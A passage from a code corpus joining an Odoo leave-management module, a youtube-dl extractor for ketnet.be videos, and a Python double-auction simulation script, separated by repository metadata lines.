'employee_id': fields.many2one('hr.employee', "Employee", select=True, invisible=False, readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'manager_id': fields.many2one('hr.employee', 'First Approval', invisible=False, readonly=True, copy=False,
help='This area is automatically filled by the user who validates the leave'),
'notes': fields.text('Reasons',readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'number_of_days_temp': fields.float('Allocation', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, copy=False),
'number_of_days': fields.function(_compute_number_of_days, string='Number of Days', store=True),
'meeting_id': fields.many2one('calendar.event', 'Meeting'),
'type': fields.selection([('remove','Leave Request'),('add','Allocation Request')], 'Request Type', required=True, readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, help="Choose 'Leave Request' if someone wants to take an off-day. \nChoose 'Allocation Request' if you want to increase the number of leaves available for someone", select=True),
'parent_id': fields.many2one('hr.holidays', 'Parent'),
'linked_request_ids': fields.one2many('hr.holidays', 'parent_id', 'Linked Requests',),
'department_id':fields.related('employee_id', 'department_id', string='Department', type='many2one', relation='hr.department', readonly=True, store=True),
'category_id': fields.many2one('hr.employee.category', "Employee Tag", help='Category of Employee', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}),
'holiday_type': fields.selection([('employee','By Employee'),('category','By Employee Tag')], 'Allocation Mode', readonly=True, states={'draft':[('readonly',False)], 'confirm':[('readonly',False)]}, help='By Employee: Allocation/Request for individual Employee, By Employee Tag: Allocation/Request for group of employees in category', required=True),
'manager_id2': fields.many2one('hr.employee', 'Second Approval', readonly=True, copy=False,
help='This area is automatically filled by the user who validates the leave at the second level (if the leave type needs a second validation)'),
'double_validation': fields.related('holiday_status_id', 'double_validation', type='boolean', relation='hr.holidays.status', string='Apply Double Validation'),
'can_reset': fields.function(
_get_can_reset,
type='boolean'),
}
_defaults = {
'employee_id': _employee_get,
'state': 'confirm',
'type': 'remove',
'user_id': lambda obj, cr, uid, context: uid,
'holiday_type': 'employee'
}
_constraints = [
(_check_date, 'You can not have 2 leaves that overlaps on same day!', ['date_from','date_to']),
(_check_holidays, 'The number of remaining leaves is not sufficient for this leave type', ['state','number_of_days_temp'])
]
_sql_constraints = [
('type_value', "CHECK( (holiday_type='employee' AND employee_id IS NOT NULL) or (holiday_type='category' AND category_id IS NOT NULL))",
"The employee or employee category of this request is missing. Please make sure that your user login is linked to an employee."),
('date_check2', "CHECK ( (type='add') OR (date_from <= date_to))", "The start date must be anterior to the end date."),
('date_check', "CHECK ( number_of_days_temp >= 0 )", "The number of days must be greater than 0."),
]
def _create_resource_leave(self, cr, uid, leaves, context=None):
'''Create an entry in the resource calendar leaves object when a holiday is validated.'''
obj_res_leave = self.pool.get('resource.calendar.leaves')
for leave in leaves:
vals = {
'name': leave.name,
'date_from': leave.date_from,
'holiday_id': leave.id,
'date_to': leave.date_to,
'resource_id': leave.employee_id.resource_id.id,
'calendar_id': leave.employee_id.resource_id.calendar_id.id
}
obj_res_leave.create(cr, uid, vals, context=context)
return True
def _remove_resource_leave(self, cr, uid, ids, context=None):
'''Remove the resource calendar leave entries when holidays are cancelled/removed.'''
obj_res_leave = self.pool.get('resource.calendar.leaves')
leave_ids = obj_res_leave.search(cr, uid, [('holiday_id', 'in', ids)], context=context)
return obj_res_leave.unlink(cr, uid, leave_ids, context=context)
def onchange_type(self, cr, uid, ids, holiday_type, employee_id=False, context=None):
result = {}
if holiday_type == 'employee' and not employee_id:
ids_employee = self.pool.get('hr.employee').search(cr, uid, [('user_id','=', uid)])
if ids_employee:
result['value'] = {
'employee_id': ids_employee[0]
}
elif holiday_type != 'employee':
result['value'] = {
'employee_id': False
}
return result
def onchange_employee(self, cr, uid, ids, employee_id):
result = {'value': {'department_id': False}}
if employee_id:
employee = self.pool.get('hr.employee').browse(cr, uid, employee_id)
result['value'] = {'department_id': employee.department_id.id}
return result
# TODO: can be improved using resource calendar method
def _get_number_of_days(self, date_from, date_to):
"""Returns a float equals to the timedelta between two dates given as string."""
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
from_dt = datetime.datetime.strptime(date_from, DATETIME_FORMAT)
to_dt = datetime.datetime.strptime(date_to, DATETIME_FORMAT)
timedelta = to_dt - from_dt
diff_day = timedelta.days + float(timedelta.seconds) / 86400
return diff_day
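# Worked example with hypothetical dates:
#   _get_number_of_days('2013-01-01 09:00:00', '2013-01-02 17:00:00')
#   -> timedelta of 1 day and 8 hours -> 1 + 28800 / 86400 = 1.333... days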
def unlink(self, cr, uid, ids, context=None):
for rec in self.browse(cr, uid, ids, context=context):
if rec.state not in ['draft', 'cancel', 'confirm']:
raise osv.except_osv(_('Warning!'),_('You cannot delete a leave which is in %s state.')%(rec.state))
return super(hr_holidays, self).unlink(cr, uid, ids, context)
def onchange_date_from(self, cr, uid, ids, date_to, date_from):
"""
If no date_to is set yet, automatically set one 8 hours later than
the date_from.
Also update the number_of_days.
"""
# date_to has to be greater than date_from
if (date_from and date_to) and (date_from > date_to):
raise osv.except_osv(_('Warning!'),_('The start date must be anterior to the end date.'))
result = {'value': {}}
# No date_to set so far: automatically compute one 8 hours later
if date_from and not date_to:
date_to_with_delta = datetime.datetime.strptime(date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=8)
result['value']['date_to'] = str(date_to_with_delta)
# Compute and update the number of days
if (date_to and date_from) and (date_from <= date_to):
diff_day = self._get_number_of_days(date_from, date_to)
result['value']['number_of_days_temp'] = round(math.floor(diff_day))+1
else:
result['value']['number_of_days_temp'] = 0
return result
def onchange_date_to(self, cr, uid, ids, date_to, date_from):
"""
Update the number_of_days.
"""
# date_to has to be greater than date_from
if (date_from and date_to) and (date_from > date_to):
raise osv.except_osv(_('Warning!'),_('The start date must be anterior to the end date.'))
result = {'value': {}}
# Compute and update the number of days
if (date_to and date_from) and (date_from <= date_to):
diff_day = self._get_number_of_days(date_from, date_to)
result['value']['number_of_days_temp'] = round(math.floor(diff_day))+1
else:
result['value']['number_of_days_temp'] = 0
return result
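# In both onchange handlers the proposed duration is
# round(math.floor(diff_day)) + 1: the first day of a leave always counts as
# a whole day. Illustrative values: diff_day = 1.33 -> 2 days proposed;
# diff_day = 0.0 (start and end at the same instant) -> 1 day proposed.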
def create(self, cr, uid, values, context=None):
""" Override to avoid automatic logging of creation """
if context is None:
context = {}
context = dict(context, mail_create_nolog=True)
if values.get('state') and values['state'] not in ['draft', 'confirm', 'cancel'] and not self.pool['res.users'].has_group(cr, uid, 'base.group_hr_user'):
raise osv.except_osv(_('Warning!'), _('You cannot set a leave request as \'%s\'. Contact a human resource manager.') % values.get('state'))
return super(hr_holidays, self).create(cr, uid, values, context=context)
def write(self, cr, uid, ids, vals, context=None):
if vals.get('state') and vals['state'] not in ['draft', 'confirm', 'cancel'] and not self.pool['res.users'].has_group(cr, uid, 'base.group_hr_user'):
raise osv.except_osv(_('Warning!'), _('You cannot set a leave request as \'%s\'. Contact a human resource manager.') % vals.get('state'))
return super(hr_holidays, self).write(cr, uid, ids, vals, context=context)
def holidays_reset(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {
'state': 'draft',
'manager_id': False,
'manager_id2': False,
})
to_unlink = []
for record in self.browse(cr, uid, ids, context=context):
for record2 in record.linked_request_ids:
self.holidays_reset(cr, uid, [record2.id], context=context)
to_unlink.append(record2.id)
if to_unlink:
self.unlink(cr, uid, to_unlink, context=context)
return True
def holidays_first_validate(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
self.holidays_first_validate_notificate(cr, uid, ids, context=context)
return self.write(cr, uid, ids, {'state':'validate1', 'manager_id': manager})
def holidays_validate(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
self.write(cr, uid, ids, {'state':'validate'})
data_holiday = self.browse(cr, uid, ids)
for record in data_holiday:
if record.double_validation:
self.write(cr, uid, [record.id], {'manager_id2': manager})
else:
self.write(cr, uid, [record.id], {'manager_id': manager})
if record.holiday_type == 'employee' and record.type == 'remove':
meeting_obj = self.pool.get('calendar.event')
meeting_vals = {
'name': record.name or _('Leave Request'),
'categ_ids': record.holiday_status_id.categ_id and [(6,0,[record.holiday_status_id.categ_id.id])] or [],
'duration': record.number_of_days_temp * 8,
'description': record.notes,
'user_id': record.user_id.id,
'start': record.date_from,
'stop': record.date_to,
'allday': False,
'state': 'open', # to block that meeting date in the calendar
'class': 'confidential'
}
#Add the partner_id (if exist) as an attendee
if record.user_id and record.user_id.partner_id:
meeting_vals['partner_ids'] = [(4,record.user_id.partner_id.id)]
ctx_no_email = dict(context or {}, no_email=True)
meeting_id = meeting_obj.create(cr, uid, meeting_vals, context=ctx_no_email)
self._create_resource_leave(cr, uid, [record], context=context)
self.write(cr, uid, ids, {'meeting_id': meeting_id})
elif record.holiday_type == 'category':
emp_ids = obj_emp.search(cr, uid, [('category_ids', 'child_of', [record.category_id.id])])
leave_ids = []
for emp in obj_emp.browse(cr, uid, emp_ids):
vals = {
'name': record.name,
'type': record.type,
'holiday_type': 'employee',
'holiday_status_id': record.holiday_status_id.id,
'date_from': record.date_from,
'date_to': record.date_to,
'notes': record.notes,
'number_of_days_temp': record.number_of_days_temp,
'parent_id': record.id,
'employee_id': emp.id
}
leave_ids.append(self.create(cr, uid, vals, context=None))
for leave_id in leave_ids:
# TODO is it necessary to interleave the calls?
for sig in ('confirm', 'validate', 'second_validate'):
self.signal_workflow(cr, uid, [leave_id], sig)
return True
def holidays_confirm(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if record.employee_id and record.employee_id.parent_id and record.employee_id.parent_id.user_id:
self.message_subscribe_users(cr, uid, [record.id], user_ids=[record.employee_id.parent_id.user_id.id], context=context)
return self.write(cr, uid, ids, {'state': 'confirm'})
def holidays_refuse(self, cr, uid, ids, context=None):
obj_emp = self.pool.get('hr.employee')
ids2 = obj_emp.search(cr, uid, [('user_id', '=', uid)])
manager = ids2 and ids2[0] or False
for holiday in self.browse(cr, uid, ids, context=context):
if holiday.state == 'validate1':
self.write(cr, uid, [holiday.id], {'state': 'refuse', 'manager_id': manager})
else:
self.write(cr, uid, [holiday.id], {'state': 'refuse', 'manager_id2': manager})
self.holidays_cancel(cr, uid, ids, context=context)
return True
def holidays_cancel(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids):
# Delete the meeting
if record.meeting_id:
record.meeting_id.unlink()
# If this request was created for a category and spawned several linked holidays, refuse them all
self.signal_workflow(cr, uid, map(attrgetter('id'), record.linked_request_ids or []), 'refuse')
self._remove_resource_leave(cr, uid, ids, context=context)
return True
def check_holidays(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if record.holiday_type != 'employee' or record.type != 'remove' or not record.employee_id or record.holiday_status_id.limit:
continue
leave_days = self.pool.get('hr.holidays.status').get_days(cr, uid, [record.holiday_status_id.id], record.employee_id.id, context=context)[record.holiday_status_id.id]
if leave_days['remaining_leaves'] < 0 or leave_days['virtual_remaining_leaves'] < 0:
# Raising a warning gives a more user-friendly feedback than the default constraint error
raise Warning(_('The number of remaining leaves is not sufficient for this leave type.\n'
'Please verify also the leaves waiting for validation.'))
return True
# -----------------------------
# OpenChatter and notifications
# -----------------------------
def _needaction_domain_get(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
empids = emp_obj.search(cr, uid, [('parent_id.user_id', '=', uid)], context=context)
dom = ['&', ('state', '=', 'confirm'), ('employee_id', 'in', empids)]
# if this user is a hr.manager, he should do second validations
if self.pool.get('res.users').has_group(cr, uid, 'base.group_hr_manager'):
dom = ['|'] + dom + [('state', '=', 'validate1')]
return dom
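# Odoo domains use prefix notation, so for an HR manager the final domain
# reads (employee ids hypothetical):
#   ['|', '&', ('state', '=', 'confirm'), ('employee_id', 'in', [7, 8]),
#    ('state', '=', 'validate1')]
# i.e. "(state = confirm AND employee in my team) OR state = validate1".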
def holidays_first_validate_notificate(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
self.message_post(cr, uid, [obj.id],
_("Request approved, waiting second validation."), context=context)
class resource_calendar_leaves(osv.osv):
_inherit = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'holiday_id': fields.many2one("hr.holidays", "Leave Request"),
}
class hr_employee(osv.osv):
_inherit="hr.employee"
def create(self, cr, uid, vals, context=None):
# don't pass the value of remaining leaves if it's 0 at creation time, otherwise it would trigger the inverse
# function _set_remaining_days even though the system may not be configured for it. Note that we don't have this
# problem on write because clients only send the fields that have been modified.
if 'remaining_leaves' in vals and not vals['remaining_leaves']:
del(vals['remaining_leaves'])
return super(hr_employee, self).create(cr, uid, vals, context=context)
def _set_remaining_days(self, cr, uid, empl_id, name, value, arg, context=None):
employee = self.browse(cr, uid, empl_id, context=context)
diff = value - employee.remaining_leaves
type_obj = self.pool.get('hr.holidays.status')
holiday_obj = self.pool.get('hr.holidays')
# Find for holidays status
status_ids = type_obj.search(cr, uid, [('limit', '=', False)], context=context)
if len(status_ids) != 1 :
raise osv.except_osv(_('Warning!'),_("The feature behind the field 'Remaining Legal Leaves' can only be used when there is only one leave type with the option 'Allow to Override Limit' unchecked. (%s Found). Otherwise, the update is ambiguous as we cannot decide on which leave type the update has to be done. \nYou may prefer to use the classic menus 'Leave Requests' and 'Allocation Requests' located in 'Human Resources \ Leaves' to manage the leave days of the employees if the configuration does not allow to use this field.") % (len(status_ids)))
status_id = status_ids and status_ids[0] or False
if not status_id:
return False
if diff > 0:
leave_id = holiday_obj.create(cr, uid, {'name': _('Allocation for %s') % employee.name, 'employee_id': employee.id, 'holiday_status_id': status_id, 'type': 'add', 'holiday_type': 'employee', 'number_of_days_temp': diff}, context=context)
elif diff < 0:
raise osv.except_osv(_('Warning!'), _('You cannot reduce validated allocation requests'))
else:
return False
for sig in ('confirm', 'validate', 'second_validate'):
holiday_obj.signal_workflow(cr, uid, [leave_id], sig)
return True
def _get_remaining_days(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
sum(h.number_of_days) as days,
h.employee_id
from
hr_holidays h
join hr_holidays_status s on (s.id=h.holiday_status_id)
where
h.state='validate' and
s.limit=False and
h.employee_id in %s
group by h.employee_id""", (tuple(ids),))
res = cr.dictfetchall()
remaining = {}
for r in res:
remaining[r['employee_id']] = r['days']
for employee_id in ids:
if not remaining.get(employee_id):
remaining[employee_id] = 0.0
return remaining
def _get_leave_status(self, cr, uid, ids, name, args, context=None):
holidays_obj = self.pool.get('hr.holidays')
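# The search below selects the leave, if any, covering the current day:
# date_from at or before now, date_to at or after today's end of day.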
holidays_id = holidays_obj.search(cr, uid,
[('employee_id', 'in', ids), ('date_from','<=',time.strftime('%Y-%m-%d %H:%M:%S')),
('date_to','>=',time.strftime('%Y-%m-%d 23:59:59')),('type','=','remove'),('state','not in',('cancel','refuse'))],
context=context)
result = {}
for id in ids:
result[id] = {
'current_leave_state': False,
'current_leave_id': False,
'leave_date_from':False,
'leave_date_to':False,
}
for holiday in self.pool.get('hr.holidays').browse(cr, uid, holidays_id, context=context):
result[holiday.employee_id.id]['leave_date_from'] = holiday.date_from
result[holiday.employee_id.id]['leave_date_to'] = holiday.date_to
result[holiday.employee_id.id]['current_leave_state'] = holiday.state
result[holiday.employee_id.id]['current_leave_id'] = holiday.holiday_status_id.id
return result
def _leaves_count(self, cr, uid, ids, field_name, arg, context=None):
Holidays = self.pool['hr.holidays']
return {
            employee_id: Holidays.search_count(cr, uid, [('employee_id', '=', employee_id), ('type', '=', 'remove')], context=context)
for employee_id in ids
}
_columns = {
'remaining_leaves': fields.function(_get_remaining_days, string='Remaining Legal Leaves', fnct_inv=_set_remaining_days, type="float", help='Total number of legal leaves allocated to this employee, change this value to create allocation/leave request. Total based on all the leave types without overriding limit.'),
'current_leave_state': fields.function(_get_leave_status, multi="leave_status", string="Current Leave Status", type="selection",
selection=[('draft', 'New'), ('confirm', 'Waiting Approval'), ('refuse', 'Refused'),
('validate1', 'Waiting Second Approval'), ('validate', 'Approved'), ('cancel', 'Cancelled')]),
'current_leave_id': fields.function(_get_leave_status, multi="leave_status", string="Current Leave Type",type='many2one', relation='hr.holidays.status'),
'leave_date_from': fields.function(_get_leave_status, multi='leave_status', type='date', string='From Date'),
'leave_date_to': fields.function(_get_leave_status, multi='leave_status', type='date', string='To Date'),
'leaves_count': fields.function(_leaves_count, type='integer', string='Leaves'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aboutsajjad/Bridge | app_packages/youtube_dl/extractor/ketnet.py | 27 | 3490 | from __future__ import unicode_literals
from .canvas import CanvasIE
from .common import InfoExtractor
class KetnetIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ketnet\.be/(?:[^/]+/)*(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'https://www.ketnet.be/kijken/zomerse-filmpjes',
'md5': '6bdeb65998930251bbd1c510750edba9',
'info_dict': {
'id': 'zomerse-filmpjes',
'ext': 'mp4',
'title': 'Gluur mee op de filmset en op Pennenzakkenrock',
'description': 'Gluur mee met Ghost Rockers op de filmset',
'thumbnail': r're:^https?://.*\.jpg$',
}
}, {
# mzid in playerConfig instead of sources
'url': 'https://www.ketnet.be/kijken/nachtwacht/de-greystook',
'md5': '90139b746a0a9bd7bb631283f6e2a64e',
'info_dict': {
'id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'display_id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'ext': 'flv',
'title': 'Nachtwacht: De Greystook',
'description': 'md5:1db3f5dc4c7109c821261e7512975be7',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 1468.03,
},
'expected_warnings': ['is not a supported codec', 'Unknown MIME type'],
}, {
'url': 'https://www.ketnet.be/kijken/karrewiet/uitzending-8-september-2016',
'only_matching': True,
}, {
'url': 'https://www.ketnet.be/achter-de-schermen/sien-repeteert-voor-stars-for-life',
'only_matching': True,
}, {
# mzsource, geo restricted to Belgium
'url': 'https://www.ketnet.be/kijken/nachtwacht/de-bermadoe',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
config = self._parse_json(
self._search_regex(
r'(?s)playerConfig\s*=\s*({.+?})\s*;', webpage,
'player config'),
video_id)
mzid = config.get('mzid')
if mzid:
return self.url_result(
'https://mediazone.vrt.be/api/v1/ketnet/assets/%s' % mzid,
CanvasIE.ie_key(), video_id=mzid)
title = config['title']
formats = []
for source_key in ('', 'mz'):
source = config.get('%ssource' % source_key)
if not isinstance(source, dict):
continue
for format_id, format_url in source.items():
if format_id == 'hls':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4',
entry_protocol='m3u8_native', m3u8_id=format_id,
fatal=False))
elif format_id == 'hds':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': config.get('description'),
'thumbnail': config.get('image'),
'series': config.get('program'),
'episode': config.get('episode'),
'formats': formats,
}
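
# Sketch of the playerConfig shape this extractor consumes (keys as referenced
# above; URLs illustrative):
#   playerConfig = {
#       "mzid": "md-ast-...",                             # if present: delegate to CanvasIE
#       "title": "...",
#       "source":   {"hls": "https://.../master.m3u8"},   # HLS -> m3u8 formats
#       "mzsource": {"hds": "https://.../manifest.f4m"},  # mirror, geo-restricted to Belgium
#   }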
| mit |
erelsgl/economics | double-auction-simulations/main.AAAI18-submission.py | 1 | 15070 | #!python3
"""
Simulation of single-type multi-unit double-auction mechanisms.
Author: Erel Segal-Halevi
Since : 2017-07
"""
import numpy as np
import pandas as pd
from pandas import DataFrame
from pandas.tools import plotting
import matplotlib.pyplot as plt
import math
import os
import random
from doubleauction import MUDA,WALRAS,walrasianEquilibrium,randomTradeWithExogeneousPrice
import torq_datasets_read as torq
from random_datasets import randomAuctions
COLUMNS=(
'Total buyers', 'Total sellers', 'Total traders', 'Min total traders', 'Total units',
'Max units per trader', 'Min units per trader', 'Normalized max units per trader', 'stddev',
'Optimal buyers', 'Optimal sellers', 'Optimal units',
'Optimal gain', 'MUDA-lottery gain', 'MUDA-Vickrey traders gain', 'MUDA-Vickrey total gain')
def replicaAuctions(replicaNums:list, auctions:list):
"""
INPUT: auctions - list of m auctions;
replicaNums - list of n integers.
OUTPUT: generator of m*n auctions, where in each auction, each agent is replicated i times.
"""
for auctionID,auctionTraders in auctions:
for replicas in replicaNums:
traders = replicas * auctionTraders
yield auctionID,traders
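
# Note: 'replicas * auctionTraders' above is plain Python list repetition, e.g.
#   2 * [t1, t2] -> [t1, t2, t1, t2]
# so every trader appears 'replicas' times in the generated auction.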
def sampleAuctions(agentNums:list, auctions:list):
"""
INPUT: auctions - list of m auctions;
agentNums - list of n integers.
OUTPUT: generator of m*n auctions, where in each auction, i agents are sampled from the empirical distribution
"""
for auctionID,auctionTraders in auctions:
for agentNum in agentNums:
traders = [random.choice(auctionTraders) for i in range(agentNum)]
yield auctionID,traders
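
# Usage sketch (dataset path hypothetical): both generators plug straight into
# simulateAuctions below, e.g.
#   auctions = sampleAuctions([10, 100], torq.auctionsBySymbol("datasets/X.CSV"))
#   simulateAuctions(auctions, "results/X.csv", keyColumns=("symbol",))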
def simulateAuctions(auctions:list, resultsFilename:str, keyColumns:list):
"""
Simulate the auctions in the given generator.
"""
columns = keyColumns+COLUMNS
results = DataFrame(columns=columns)
print("\t{}".format(columns))
resultsFilenameTemp = resultsFilename+".temp"
for auctionID,traders in auctions:
if not traders:
raise ValueError("traders for auction {} is empty", auctionID)
print("Simulating auction {} with {} traders".format(auctionID,len(traders)))
totalBuyers = sum([t.isBuyer for t in traders])
totalSellers = len(traders)-totalBuyers
unitsPerTrader = [t.totalUnits() for t in traders]
maxUnitsPerTrader = max(unitsPerTrader)
minUnitsPerTrader = min(unitsPerTrader)
        stddev = np.sqrt(sum([t.totalUnits()**2 for t in traders]))  # root-sum-of-squares of the unit counts, not a sample standard deviation
(buyersWALRAS, sellersWALRAS, sizeWALRAS, gainWALRAS) = WALRAS(traders)
        (sizeMUDALottery, tradersGainMUDALottery, totalGainMUDALottery, sizeMUDAVickrey, tradersGainMUDAVickrey, totalGainMUDAVickrey) = MUDA(traders, Lottery=True, Vickrey=True)
resultsRow = [
*auctionID,
totalBuyers, totalSellers, totalBuyers+totalSellers, min(totalBuyers,totalSellers), sum(unitsPerTrader),
maxUnitsPerTrader, minUnitsPerTrader, maxUnitsPerTrader/max(1,minUnitsPerTrader), stddev,
buyersWALRAS, sellersWALRAS, sizeWALRAS,
            gainWALRAS, totalGainMUDALottery, tradersGainMUDAVickrey, totalGainMUDAVickrey]
print("\t{}".format(resultsRow))
results.loc[len(results)] = resultsRow
results.to_csv(resultsFilenameTemp)
results.to_csv(resultsFilename)
os.remove(resultsFilenameTemp)
return results
def torqSimulationBySymbolDate(filename, combineByOrderDate=False, replicaNums=[1]):
"""
Treat each (symbol,date) combination as a separate auction.
"""
datasetFilename = "datasets/"+filename+".CSV"
resultsFilename = "results/"+filename+("-combined" if combineByOrderDate else "")+"-x"+str(max(replicaNums))+".csv"
return simulateAuctions(replicaAuctions(replicaNums,
torq.auctionsBySymbolDate(datasetFilename, combineByOrderDate)),
resultsFilename, keyColumns=("symbol","date"))
def torqSimulateBySymbol(filename, combineByOrderDate=False, agentNums=[100]):
"""
Treat all bidders for the same symbol, in ALL dates, as a distribution of values for that symbol.
"""
datasetFilename = "datasets/"+filename+".CSV"
resultsFilename = "results/"+filename+("-combined" if combineByOrderDate else "")+"-s"+str(max(agentNums))+".csv"
return simulateAuctions(sampleAuctions(agentNums,
torq.auctionsBySymbol(datasetFilename, combineByOrderDate)),
resultsFilename, keyColumns=("symbol",))
### PLOTS ###
YLABEL = 'MUDA GFT divided by maximum GFT'
YLIM = [0,1.05]
titleFontSize = 20
legendFontSize = 20
axesFontSize = 20
markerSize = 14
def plotTorq(filename, resultsFilename=None, combineByOrderDate=False, replicaNums=None, agentNums=None, numOfBins=10, ax=None, title=None, xColumn = 'Optimal units'):
if resultsFilename:
pass
elif replicaNums:
resultsFilename = "results/"+\
filename+\
("-combined" if combineByOrderDate else "")+\
"-x"+str(max(replicaNums))+\
".csv"
elif agentNums:
resultsFilename = "results/"+\
filename+\
("-combined" if combineByOrderDate else "")+\
"-s"+str(max(agentNums))+\
".csv"
else:
raise(Error("cannot calculate resultsFilename"))
plotResults(resultsFilename, xColumn=xColumn, numOfBins=numOfBins, ax=ax, title=title)
def plotResults(resultsFilename=None, xColumn='Min total traders', numOfBins=10, ax=None, title=None):
if not ax:
ax = plt.subplot(1, 1, 1)
if not title:
title = resultsFilename
print("plotting",resultsFilename)
results = pd.read_csv(resultsFilename)
results['Optimal market size'] = (results['Optimal buyers']+results['Optimal sellers']) / 2
results['Normalized market size'] = results['Optimal units'] / (results['Max units per trader'])
results['log10(M)'] = np.log(results['Max units per trader'])/np.log(10)
print(len(results), " auctions")
results = results[results['Optimal gain']>0]
print(len(results), " auctions with positive optimal gain")
for field in ['MUDA-lottery', 'MUDA-Vickrey traders', 'MUDA-Vickrey total']:
results[field+' ratio'] = results[field+' gain'] / results['Optimal gain']
if numOfBins:
results_bins = results.groupby(pd.cut(results[xColumn],numOfBins)).mean()
else:
results_bins = results.groupby(results[xColumn]).mean()
results_bins.plot(x=xColumn, y='MUDA-Vickrey total ratio', style=['b^-'], ax=ax, markersize=markerSize)
results_bins.plot(x=xColumn, y='MUDA-Vickrey traders ratio', style=['gv-'], ax=ax, markersize=markerSize)
results_bins.plot(x=xColumn, y='MUDA-lottery ratio', style=['ro-'], ax=ax, markersize=markerSize)
#plt.legend(loc=0,prop={'size':legendFontSize})
ax.legend_.remove()
ax.set_title(title, fontsize= titleFontSize, weight='bold')
ax.set_ylabel(YLABEL, fontsize= axesFontSize)
ax.tick_params(axis='both', which='major', labelsize=axesFontSize)
ax.tick_params(axis='both', which='minor', labelsize=axesFontSize)
ax.set_ylim(YLIM)
### MAIN PROGRAM ###
MUDA.LOG = randomTradeWithExogeneousPrice.LOG = False
def torqSimulation():
numOfBins = 100
numOfTraderss=list(range(10,1000,10))*1
filename = "901101-910131-SOD" #"910121-910121-IBM-SOD" # "901101-910131-SOD" # "901101-910131- SOD-NORM" #
if createResults:
torqSimulateBySymbol(filename, combineByOrderDate=True, agentNums=numOfTraderss)
torqSimulateBySymbol(filename, combineByOrderDate=False, agentNums=numOfTraderss)
#torqSimulateBySymbol(filename+"-NORM", combineByOrderDate=False, agentNums=numOfTraderss)
#torqSimulateBySymbol(filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss)
#plotTorq(filename=filename, combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins)
# plotTorq(filename=filename, combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax = plt.subplot(1,1,1), title="Auctions based on TORQ database", xColumn="Optimal units")
# plt.xlabel('Optimal #units (k)')
ax = plt.subplot(1,2,2)
plotTorq(filename=filename, combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
ax=ax, title="TORQ; combined", xColumn="Total traders")
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
ax.set_ylabel("")
ax = plt.subplot(1,2,1, sharey=None)
plotTorq(filename=filename, combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins, ax=ax, title="TORQ; additive", xColumn="Total traders")
ax.set_xlabel('Total #traders', fontsize=axesFontSize)
ax.set_xlim([0,1000])
plt.show()
# ax = plt.subplot(1,2,2)
# plotTorq(filename=filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax=ax, title="TORQ; normalized, combined", xColumn="Total traders")
# ax.set_xlabel('Total #traders', fontsize=axesFontSize)
# ax.set_xlim([0,1000])
# ax = plt.subplot(1,2,1, sharey=ax)
# plotTorq(filename=filename+"-NORM", combineByOrderDate=False, agentNums=numOfTraderss, numOfBins=numOfBins, ax=ax, title="TORQ; normalized, additive", xColumn="Total traders")
# ax.set_xlabel('Total #traders', fontsize=axesFontSize)
# ax.set_xlim([0,1000])
# plt.show()
# plotTorq(filename=filename+"-NORM", combineByOrderDate=True, agentNums=numOfTraderss, numOfBins=numOfBins,
# ax = plt.subplot(2,1,2))
# plt.show()
def randomSimulation(numOfAuctions = 100):
numOfTraderss = range(2000000, 42000000, 2000000)
minNumOfUnitsPerTrader = 10
maxNumOfUnitsPerTraders = [100,1000,10000,1000000,10000000,100000000,100000]
meanValue = 500
maxNoiseSizes = [50,100,150,200,300,350,400,450,500,250]
numOfBins = 20
# general
filenameTraders = "results/random-traders-{}units-{}noise.csv".format(maxNumOfUnitsPerTraders[-1],maxNoiseSizes[-1])
filenameUnitsFixedTraders = "results/random-units-{}traders-{}noise.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
filenameUnitsFixedVirtual = "results/random-units-{}virtual-{}noise.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
filenameNoise = "results/random-noise-{}traders-{}units.csv".format(numOfTraderss[-1],maxNumOfUnitsPerTraders[3])
# additive
filenameTradersAdd = "results/random-traders-{}units-{}noise-additive.csv".format(maxNumOfUnitsPerTraders[3],maxNoiseSizes[-1])
filenameUnitsAdd = "results/random-units-{}traders-{}noise-additive.csv".format(numOfTraderss[-1],maxNoiseSizes[-1])
